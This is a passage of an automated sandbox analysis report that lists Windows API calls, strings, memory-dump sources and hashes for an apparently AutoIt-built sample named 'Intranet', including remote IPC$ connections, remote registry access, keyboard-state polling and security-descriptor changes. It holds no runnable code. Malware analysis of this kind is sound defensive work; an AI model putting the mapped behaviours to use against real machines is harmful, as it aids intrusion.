                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000,00000000,?), ref: 0052C8A4
                                                                            • GetFocus.USER32(?,?,?,?), ref: 0052C8B4
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0052C8BF
                                                                            • _memset.LIBCMT ref: 0052C9EA
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0052CA15
                                                                            • GetMenuItemCount.USER32(?), ref: 0052CA35
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0052CA48
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0052CA7C
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0052CAC4
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0052CAFC
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0052CB31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1296962147-4108050209
                                                                            • Opcode ID: eec024e939f98e77bb650a7f2230c6017dbea23c44f00765b263bd926ddd3001
                                                                            • Instruction ID: 60358443bad21140961690284d17691f94de7f44e25e0805667167d5d20bf712
                                                                            • Opcode Fuzzy Hash: eec024e939f98e77bb650a7f2230c6017dbea23c44f00765b263bd926ddd3001
                                                                            • Instruction Fuzzy Hash: 6D819970208325AFD710CF14E885A6EBFE8FF8A754F00492EF98593292C770D905DBA2
                                                                            APIs
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,004F8900,?,?,?), ref: 004F8E3C
                                                                              • Part of subcall function 004F8E20: GetLastError.KERNEL32(?,004F8900,?,?,?), ref: 004F8E46
                                                                              • Part of subcall function 004F8E20: GetProcessHeap.KERNEL32(00000008,?,?,004F8900,?,?,?), ref: 004F8E55
                                                                              • Part of subcall function 004F8E20: HeapAlloc.KERNEL32(00000000,?,004F8900,?,?,?), ref: 004F8E5C
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,004F8900,?,?,?), ref: 004F8E73
                                                                              • Part of subcall function 004F8EBD: GetProcessHeap.KERNEL32(00000008,004F8916,00000000,00000000,?,004F8916,?), ref: 004F8EC9
                                                                              • Part of subcall function 004F8EBD: HeapAlloc.KERNEL32(00000000,?,004F8916,?), ref: 004F8ED0
                                                                              • Part of subcall function 004F8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004F8916,?), ref: 004F8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F8B2E
                                                                            • _memset.LIBCMT ref: 004F8B43
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F8B62
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F8B73
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004F8BB0
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F8BCC
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F8BE9
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004F8BF8
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004F8BFF
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F8C20
                                                                            • CopySid.ADVAPI32(00000000), ref: 004F8C27
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F8C58
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F8C7E
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F8C92
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            APIs
                                                                            • GetDC.USER32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,005160F0), ref: 00517A79
                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?,?,?,?,?,?,?,?,?,?,?,?,005160F0,?), ref: 00517A85
                                                                            • CreateCompatibleDC.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,005160F0,?,?,00000006), ref: 00517A91
                                                                            • SelectObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,005160F0,?,?), ref: 00517A9E
                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00517AF2
                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00517B2E
                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00517B52
                                                                            • SelectObject.GDI32(00000006,?), ref: 00517B5A
                                                                            • DeleteObject.GDI32(?), ref: 00517B63
                                                                            • DeleteDC.GDI32(00000006), ref: 00517B6A
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00517B75
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?,?,00530990,?,004E30B6,00000085,?), ref: 0050A4D4
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • LoadStringW.USER32(?,?,00000FFF,?,?,004E30B6,00000085,?), ref: 0050A4F6
                                                                            • __swprintf.LIBCMT ref: 0050A54F
                                                                            • __swprintf.LIBCMT ref: 0050A568
                                                                            • _wprintf.LIBCMT ref: 0050A61E
                                                                            • _wprintf.LIBCMT ref: 0050A63C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-2391861430
                                                                            APIs
                                                                              • Part of subcall function 0050951A: __time64.LIBCMT ref: 00509524
                                                                              • Part of subcall function 004B4A8C: _fseek.LIBCMT ref: 004B4AA4
                                                                            • __wsplitpath.LIBCMT ref: 005097EF
                                                                              • Part of subcall function 004C431E: __wsplitpath_helper.LIBCMT ref: 004C435E
                                                                            • _wcscpy.LIBCMT ref: 00509802
                                                                            • _wcscat.LIBCMT ref: 00509815
                                                                            • __wsplitpath.LIBCMT ref: 0050983A
                                                                            • _wcscat.LIBCMT ref: 00509850
                                                                            • _wcscat.LIBCMT ref: 00509863
                                                                              • Part of subcall function 00509560: _memmove.LIBCMT ref: 00509599
                                                                              • Part of subcall function 00509560: _memmove.LIBCMT ref: 005095A8
                                                                            • _wcscmp.LIBCMT ref: 005097AA
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DE1
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DF4
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00509A0D
                                                                            • _wcsncpy.LIBCMT ref: 00509A80
                                                                            • DeleteFileW.KERNEL32(?,?), ref: 00509AB6
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00509ACC
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00509ADD
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00509AEF
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1500180987-0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004B5BF1
                                                                            • GetMenuItemCount.USER32(00567890,?,?), ref: 004F0E7B
                                                                            • GetMenuItemCount.USER32(00567890), ref: 004F0F2B
                                                                            • GetCursorPos.USER32(?), ref: 004F0F6F
                                                                            • SetForegroundWindow.USER32(00000000), ref: 004F0F78
                                                                            • TrackPopupMenuEx.USER32(00567890,00000000,?,00000000,00000000,00000000), ref: 004F0F8B
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004F0F97
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 2751501086-0
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00530980), ref: 0050AF4E
                                                                            • GetDriveTypeW.KERNEL32(00000061,0055B5F0,00000061), ref: 0050B018
                                                                            • _wcscpy.LIBCMT ref: 0050B042
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: L,S$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-1244258893
                                                                            APIs
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • _memset.LIBCMT ref: 004F8489
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000,\IPC$,?), ref: 004F84BE
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F84DA
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004F84F6
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004F8520
                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 004F8548
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F8553
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F8558
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 1411258926-22481851
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004EFB41,00000010,?,Bad directive syntax error,00530980,00000000,?,?,?), ref: 004FFF7D
                                                                            • LoadStringW.USER32(00000000,?,004EFB41,00000010,?,Bad directive syntax error,00530980,00000000,?,?,?,?,?,?,?,00000001), ref: 004FFF84
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • _wprintf.LIBCMT ref: 004FFFB7
                                                                            • __swprintf.LIBCMT ref: 004FFFD9
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010,.,00000001,Error: ,?,?,00000001), ref: 00500048
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 1506413516-4153970271
                                                                            • Opcode ID: 36e7fa9f8710137aad3a2f7ba0b4e241f5850721af49f156d7d732c4b87d84a9
                                                                            • Instruction ID: f34ea7ec752d0262ceb09b532f11a230a5a6406ec0c7c3ef9a70b180bf1d9261
                                                                            • Opcode Fuzzy Hash: 36e7fa9f8710137aad3a2f7ba0b4e241f5850721af49f156d7d732c4b87d84a9
                                                                            • Instruction Fuzzy Hash: 1B21A27184021EABCF12EF90CC2AFEE7B39BF18305F44455BF505621A2DA75A62CDB25
                                                                            APIs
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                              • Part of subcall function 004B153B: _memmove.LIBCMT ref: 004B15C4
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005058EB
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00505901
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00505912
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00505924
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00505935
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2279737902-1007645807
                                                                            • Opcode ID: bd15b2946e26b2ef42673dcfbaa7175712ef94d2619a68eebd9ce7419ccf7e55
                                                                            • Instruction ID: 1783e63c750e945374a30e4365add71091082e2701621676fcffbd6350960a65
                                                                            • Opcode Fuzzy Hash: bd15b2946e26b2ef42673dcfbaa7175712ef94d2619a68eebd9ce7419ccf7e55
                                                                            • Instruction Fuzzy Hash: 42118671950159B9E720A7A2DC6EDFF6F7CFB91B51F800C2A7801A20E1EA601908C9B1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$#115#116_memmove_strcat
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 1745391200-3771769585
                                                                            • Opcode ID: 3e1bf90a93e265d0f62650a41a5fdda0d98cd6e53e4b3f98d35df29db91c7cde
                                                                            • Instruction ID: cdc2676e0aa62d4f9bb09122e59a1e4d1c54425b3c5db9edb071a218cf08b274
                                                                            • Opcode Fuzzy Hash: 3e1bf90a93e265d0f62650a41a5fdda0d98cd6e53e4b3f98d35df29db91c7cde
                                                                            • Instruction Fuzzy Hash: 42113675504208ABDB95A7619D4AFEE7BBCFF41710F0001AEF504A21D1EFB49D859E90
                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004A3444
                                                                            • RegisterClassExW.USER32(00000030), ref: 004A346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004A347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004A349C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004A34AC
                                                                            • LoadIconW.USER32(000000A9), ref: 004A34C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004A34D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: c114473a88ad4b556c9b7aaf0abed4917a0395ea7749f6482e8a2386f5f40be3
                                                                            • Instruction ID: 9a924067fba3e1168b5d1c45531ceccfa3398e1eb6d0bec3081eb92a70db15b9
                                                                            • Opcode Fuzzy Hash: c114473a88ad4b556c9b7aaf0abed4917a0395ea7749f6482e8a2386f5f40be3
                                                                            • Instruction Fuzzy Hash: 033125B1804309AFDB40CFA8EC98AD9BFF4FB29314F10425AE541E72A0D3B54689DF90
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00505535
                                                                              • Part of subcall function 004C083E: timeGetTime.WINMM(?,00000002,004AC22C), ref: 004C0842
                                                                            • Sleep.KERNEL32(0000000A), ref: 00505561
                                                                            • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00505585
                                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 005055A7
                                                                            • SetActiveWindow.USER32 ref: 005055C6
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005055D4
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 005055F3
                                                                            • Sleep.KERNEL32(000000FA), ref: 005055FE
                                                                            • IsWindow.USER32 ref: 0050560A
                                                                            • EndDialog.USER32(00000000), ref: 0050561B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 5a8709891f9b8d5465e0cd626cf9b46616eae72cbd55f0c34a1e3244c35503ac
                                                                            • Instruction ID: d22c33a29f146248e9e0849cf75e797f7157d33c51ff34a13f61cbb6aae4e295
                                                                            • Opcode Fuzzy Hash: 5a8709891f9b8d5465e0cd626cf9b46616eae72cbd55f0c34a1e3244c35503ac
                                                                            • Instruction Fuzzy Hash: 29218070104A05BFE7515B64EC99A3A3F6AFB75749F402018F442822E1EFB15D58EE21
                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004A3444
                                                                            • RegisterClassExW.USER32(00000030), ref: 004A346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004A347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004A349C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004A34AC
                                                                            • LoadIconW.USER32(000000A9), ref: 004A34C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004A34D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 61dd9ea4d8d60a039ba1a614416dbe1420b28bfc1c650cf65c8310226aa8a764
                                                                            • Instruction ID: 68fdfde9af5f7702a0eee9cc36273126eb3ef84ac31a6c3aede05c419fce24e1
                                                                            • Opcode Fuzzy Hash: 61dd9ea4d8d60a039ba1a614416dbe1420b28bfc1c650cf65c8310226aa8a764
                                                                            • Instruction Fuzzy Hash: 6921E2B190431CAFEB009FA8EC98B9DBBF4FB28704F00511AF510A72A0D7B15948EF95
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • CoInitialize.OLE32(00000000,00530980), ref: 0050DC2D
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0050DCC0
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0050DCD4
                                                                            • CoCreateInstance.OLE32(00533D4C,00000000,00000001,0055B86C,?), ref: 0050DD20
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0050DD8F
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 0050DDE7
                                                                            • _memset.LIBCMT ref: 0050DE24
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0050DE60
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?,?), ref: 0050DE83
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0050DE8A
                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0050DEC1
                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0050DEC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: f546326d5d9510b00034e05b6c72eabc5def3a44a0f70124786aea0bfe623376
                                                                            • Instruction ID: 43a132e343e0d93174bf1a4b45116df44d9cfa856b8746e5a5a65de931a6e446
                                                                            • Opcode Fuzzy Hash: f546326d5d9510b00034e05b6c72eabc5def3a44a0f70124786aea0bfe623376
                                                                            • Instruction Fuzzy Hash: C1B10C75A00109AFDB04DFA5C898DAEBBB9FF88304B108459F905EB351DB34EE45CB64
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00500896
                                                                            • SetKeyboardState.USER32(?), ref: 00500901
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00500921
                                                                            • GetKeyState.USER32(000000A0), ref: 00500938
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00500967
                                                                            • GetKeyState.USER32(000000A1), ref: 00500978
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 005009A4
                                                                            • GetKeyState.USER32(00000011), ref: 005009B2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 005009DB
                                                                            • GetKeyState.USER32(00000012), ref: 005009E9
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00500A12
                                                                            • GetKeyState.USER32(0000005B), ref: 00500A20
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
